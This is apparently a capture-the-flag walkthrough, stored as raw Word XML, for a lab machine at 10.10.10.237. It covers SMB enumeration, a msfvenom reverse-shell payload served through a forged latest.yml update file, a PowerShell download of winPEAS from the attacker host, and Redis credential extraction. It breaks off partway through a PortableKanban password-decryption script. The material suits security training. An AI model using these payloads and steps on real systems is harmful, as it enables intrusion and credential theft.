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D22" w:rsidRDefault="00154D22" w:rsidP="00154D22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5E3898" w:rsidRDefault="00154D22" w:rsidP="00154D22">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 10.10.10.237</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00154D22" w:rsidRDefault="008877AE" w:rsidP="00154D22">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F4EE5CA" wp14:editId="06A50A48">
            <wp:extent cx="5731510" cy="3437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AE" w:rsidRDefault="008877AE" w:rsidP="00154D22"/>
    <w:p w:rsidR="00540B22" w:rsidRDefault="00540B22" w:rsidP="00540B22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540B22" w:rsidRDefault="00540B22" w:rsidP="00540B22">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rpcclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -U "guest" $RHOST 10.10.10.237                                                                                                                                                     1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⨯</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00540B22" w:rsidRDefault="00540B22" w:rsidP="00540B22">
      <w:r>
        <w:t xml:space="preserve">Enter WORKGROUP\guest's password: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00540B22" w:rsidRDefault="00540B22" w:rsidP="00540B22">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rpcclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $&gt; lsaenumsid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00540B22" w:rsidRDefault="009C52BC" w:rsidP="00540B22">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A093F00" wp14:editId="0480E630">
            <wp:extent cx="4876800" cy="357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BC" w:rsidRDefault="009C52BC" w:rsidP="00540B22"/>
    <w:p w:rsidR="00F60D9B" w:rsidRDefault="00F60D9B" w:rsidP="00F60D9B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9C52BC" w:rsidRDefault="00F60D9B" w:rsidP="00F60D9B">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u "guest" -p "" -H $RHOST 10.10.10.237</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F60D9B" w:rsidRDefault="00A84ABF" w:rsidP="00F60D9B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A96AB8E" wp14:editId="73CABC5D">
            <wp:extent cx="5731510" cy="11607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BF" w:rsidRDefault="00A84ABF" w:rsidP="00F60D9B"/>
    <w:p w:rsidR="008C615E" w:rsidRDefault="008C615E" w:rsidP="008C615E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8C615E" w:rsidRDefault="008C615E" w:rsidP="008C615E">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u "guest" -p "" -R '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Software_Updates</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' -H $RHOST 10.10.10.237</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C615E" w:rsidRDefault="009B2662" w:rsidP="008C615E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71DF9EDB" wp14:editId="15F275BF">
            <wp:extent cx="5731510" cy="22840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62" w:rsidRDefault="009B2662" w:rsidP="008C615E"/>
    <w:p w:rsidR="00E06BED" w:rsidRDefault="00E06BED" w:rsidP="00E06BED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kali)-[/]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B2662" w:rsidRDefault="00E06BED" w:rsidP="00E06BED">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mount.cifs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> //10.10.10.237/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Software_Updates</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ouser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=guest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E06BED" w:rsidRDefault="00E06BED" w:rsidP="00E06BED">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BB5D1B0" wp14:editId="1C2FBEF7">
            <wp:extent cx="5105400" cy="561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ED" w:rsidRDefault="00E06BED" w:rsidP="00E06BED"/>
    <w:p w:rsidR="00E06BED" w:rsidRDefault="00A85A7B" w:rsidP="00E06BED">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="027DE19F" wp14:editId="025A923E">
            <wp:extent cx="4200525" cy="1057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7B" w:rsidRDefault="00A85A7B" w:rsidP="00E06BED"/>
    <w:p w:rsidR="009957FF" w:rsidRDefault="009957FF" w:rsidP="009957FF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9957FF" w:rsidRDefault="009957FF" w:rsidP="009957FF">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST=10.10.15.37 LPORT=1234 -f exe &gt; rev\'shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009957FF" w:rsidRDefault="009957FF" w:rsidP="009957FF">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44218C30" wp14:editId="12591461">
            <wp:extent cx="5731510" cy="8578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FF" w:rsidRDefault="009957FF" w:rsidP="009957FF"/>
    <w:p w:rsidR="006E1567" w:rsidRDefault="006E1567" w:rsidP="006E156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6E1567" w:rsidRDefault="006E1567" w:rsidP="006E1567">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shasum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a 512 rev\'shell.exe | cut -d " " -f1 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -r -p | base64 -w 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E1567" w:rsidRDefault="00BA0481" w:rsidP="006E1567">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CE91677" wp14:editId="117C61A8">
            <wp:extent cx="5731510" cy="4908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50" w:rsidRDefault="00EC7F50" w:rsidP="00EC7F50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EC7F50" w:rsidRDefault="00EC7F50" w:rsidP="00EC7F50">
      <w:r>
        <w:t xml:space="preserve">└─# cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>latest.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7F50" w:rsidRDefault="00EC7F50" w:rsidP="00EC7F50">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>version</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: 1.2.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7F50" w:rsidRDefault="00047B93" w:rsidP="00EC7F50">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>path</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: http://10.10.15.37/rev</w:t>
      </w:r>
      <w:r w:rsidR="00EC7F50">
        <w:t>'shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA0481" w:rsidRDefault="00EC7F50" w:rsidP="00EC7F50">
      <w:r>
        <w:t>sha512: IswmuLbsoYObBP+iLfo05mWxJXlt5nzGX5QYyEBLEj0vqCjOiX8yPPmsCFpcuwbY3aNHy68vWBiM6CBsU9fsPw==</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC7F50" w:rsidRDefault="00047B93" w:rsidP="00EC7F50">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F51476C" wp14:editId="6B63188D">
            <wp:extent cx="5731510" cy="6457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05" w:rsidRDefault="00E26405" w:rsidP="00EC7F50"/>
    <w:p w:rsidR="00EA3D53" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53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E26405" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>latest.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/client1/    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3D53" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="094B07CD" wp14:editId="1D5D4CFD">
            <wp:extent cx="3228975" cy="485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53" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="00AE0469" w:rsidRDefault="00AE0469" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AFA2FEC" wp14:editId="66E22723">
            <wp:extent cx="3048000" cy="600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53" w:rsidRDefault="00EA3D53" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="005F25C6" w:rsidRDefault="00B16772" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BAAA2A3" wp14:editId="6E878DCF">
            <wp:extent cx="5731510" cy="8750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772" w:rsidRDefault="00B16772" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="00B16772" w:rsidRDefault="003E5083" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="558D9CCD" wp14:editId="0FE87E3C">
            <wp:extent cx="4800600" cy="1409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83" w:rsidRDefault="003E5083" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="003E5083" w:rsidRDefault="00937A9B" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="090082AB" wp14:editId="13629900">
            <wp:extent cx="4391025" cy="6715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9B" w:rsidRDefault="00937A9B" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="00B06737" w:rsidRDefault="00B06737" w:rsidP="00EA3D53">
      <w:r>
        <w:t>User.txt</w:t>
      </w:r>
      <w:r w:rsidR="00251793">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B06737">
        <w:t>c1ce5ddaf836dd0</w:t>
      </w:r>
      <w:r w:rsidR="009D0525">
        <w:t>XXXXXXXXXXXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00965CBD" w:rsidRDefault="00965CBD" w:rsidP="00EA3D53">
      <w:r w:rsidRPr="00965CBD">
        <w:t xml:space="preserve">C:\Users\jason\Desktop&gt;powershell.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965CBD">
        <w:t>iwr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965CBD">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965CBD">
        <w:t>UseBasicParsing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965CBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00193FE1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.15.37/winPEASx64.exe -</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00193FE1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>OutFile</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00193FE1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> winPEASx64.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00965CBD" w:rsidRDefault="00965CBD" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="009A6CA6" w:rsidRDefault="009A6CA6" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B07D5F8" wp14:editId="37962E97">
            <wp:extent cx="5731510" cy="18669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6" w:rsidRDefault="009A6CA6" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="00012986" w:rsidRDefault="00012986" w:rsidP="00EA3D53">
      <w:r w:rsidRPr="00012986">
        <w:t>C:\Users\jason\Desktop&gt;winPEASx64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00861246" w:rsidRDefault="00861246" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="341F81BD" wp14:editId="2B975E20">
            <wp:extent cx="5731510" cy="20008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46" w:rsidRDefault="00861246" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="00764E54" w:rsidRDefault="00764E54" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D928818" wp14:editId="31FBCAFE">
            <wp:extent cx="5731510" cy="10788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54" w:rsidRDefault="00A13959" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="742A4A49" wp14:editId="766C9BCB">
            <wp:extent cx="5731510" cy="19742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59" w:rsidRDefault="00DF2306" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CCC84FC" wp14:editId="4AF06853">
            <wp:extent cx="5731510" cy="26873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06" w:rsidRDefault="00DF2306" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="00CD2BAF" w:rsidRDefault="00C5019B" w:rsidP="00EA3D53">
      <w:r>
        <w:t xml:space="preserve">Search: </w:t>
      </w:r>
      <w:r w:rsidR="00CD2BAF" w:rsidRPr="00CD2BAF">
        <w:t>portable kanban.exe exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2BAF" w:rsidRDefault="00C5019B" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="776AB2CD" wp14:editId="7869241F">
            <wp:extent cx="5731510" cy="30016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9B" w:rsidRDefault="00C5019B" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="009A11DC" w:rsidRDefault="004C42CA" w:rsidP="00EA3D53">
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="009A11DC" w:rsidRPr="00193FE1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/49409</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009A11DC" w:rsidRDefault="00D07FBE" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A8F4FD2" wp14:editId="21B2F16A">
            <wp:extent cx="5731510" cy="28638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BE" w:rsidRDefault="00D07FBE" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="00D07FBE" w:rsidRDefault="00E312EB" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E58B3FD" wp14:editId="2EA8A93E">
            <wp:extent cx="5731510" cy="54463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EB" w:rsidRDefault="007C5AA5" w:rsidP="00EA3D53">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C276E0D" wp14:editId="7F89E0AF">
            <wp:extent cx="5731510" cy="51352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A5" w:rsidRDefault="007C5AA5" w:rsidP="00EA3D53"/>
    <w:p w:rsidR="00B64886" w:rsidRDefault="002065C7" w:rsidP="00EA3D53">
      <w:r>
        <w:t>We get the pass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002065C7" w:rsidRDefault="002065C7" w:rsidP="00EA3D53">
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002065C7">
        <w:t>kidvscat_yes_kidvscat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00190A25" w:rsidRDefault="00190A25" w:rsidP="00190A25"/>
    <w:p w:rsidR="00016145" w:rsidRDefault="00016145" w:rsidP="00016145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F02F13" w:rsidRDefault="00016145" w:rsidP="00016145">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-cli -h 10.10.10.237 -a '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kidvscat_yes_kidvscat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00016145" w:rsidRDefault="0079292A" w:rsidP="00016145">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E4E4395" wp14:editId="17C346A9">
            <wp:extent cx="5731510" cy="5562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A" w:rsidRDefault="0079292A" w:rsidP="00016145"/>
    <w:p w:rsidR="0079292A" w:rsidRDefault="00F93F78" w:rsidP="00016145">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="768F3170" wp14:editId="3DA159B2">
            <wp:extent cx="5314950" cy="7410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9A" w:rsidRDefault="00B5379A" w:rsidP="00016145"/>
    <w:p w:rsidR="009856D1" w:rsidRDefault="009856D1" w:rsidP="00016145">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="689FD4F1" wp14:editId="56B91131">
            <wp:extent cx="2743200" cy="6915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D1" w:rsidRDefault="009856D1" w:rsidP="00016145"/>
    <w:p w:rsidR="009856D1" w:rsidRDefault="009856D1" w:rsidP="00016145">
      <w:r>
        <w:t>I use the keys * command to list all keys and a hash of the user “Administrator” appears. Now we have a hash, and as I mentioned above, we also have one script. With a little Google search, I edited the above script and only decode the hash I had given</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009856D1" w:rsidRDefault="009856D1" w:rsidP="00016145"/>
    <w:p w:rsidR="00B5379A" w:rsidRDefault="00B5379A" w:rsidP="00016145">
      <w:r w:rsidRPr="00B5379A">
        <w:t>10.10.10.237:6379&gt; keys *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5379A" w:rsidRDefault="000D10B9" w:rsidP="00016145">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E3A7EC4" wp14:editId="0D57BD85">
            <wp:extent cx="4876800" cy="990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B9" w:rsidRDefault="000D10B9" w:rsidP="00016145"/>
    <w:p w:rsidR="00F93F78" w:rsidRDefault="00D953DF" w:rsidP="00016145">
      <w:r w:rsidRPr="00D953DF">
        <w:t>10.10.10.237:6379&gt; get pk</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D953DF">
        <w:t>:urn:user:e8e29158</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D953DF">
        <w:t>-d70d-44b1-a1ba-4949d52790a0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D953DF" w:rsidRDefault="00D953DF" w:rsidP="00016145">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36B05F68" wp14:editId="2E0762F5">
            <wp:extent cx="5731510" cy="715618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5037" cy="7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DF" w:rsidRDefault="003726E5" w:rsidP="00016145">
      <w:r>
        <w:t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:r w:rsidRPr="003726E5">
        <w:t>Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003726E5" w:rsidRDefault="003726E5" w:rsidP="00016145">
      <w:r>
        <w:t xml:space="preserve">Encrypted password: </w:t>
      </w:r>
      <w:r w:rsidRPr="003726E5">
        <w:t>Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003726E5" w:rsidRDefault="003726E5" w:rsidP="00016145"/>
    <w:p w:rsidR="0086466B" w:rsidRDefault="004C42CA" w:rsidP="00016145">
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="0086466B" w:rsidRPr="00193FE1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/49409</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001A08FC" w:rsidRPr="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="00016145">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A08FC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>exploit.py:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> base64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> des import * #python3 -m pip install des</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC"/>
    <w:p w:rsidR="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(input("Enter the Hash : "))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A08FC" w:rsidRDefault="001A08FC" w:rsidP="001A08FC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
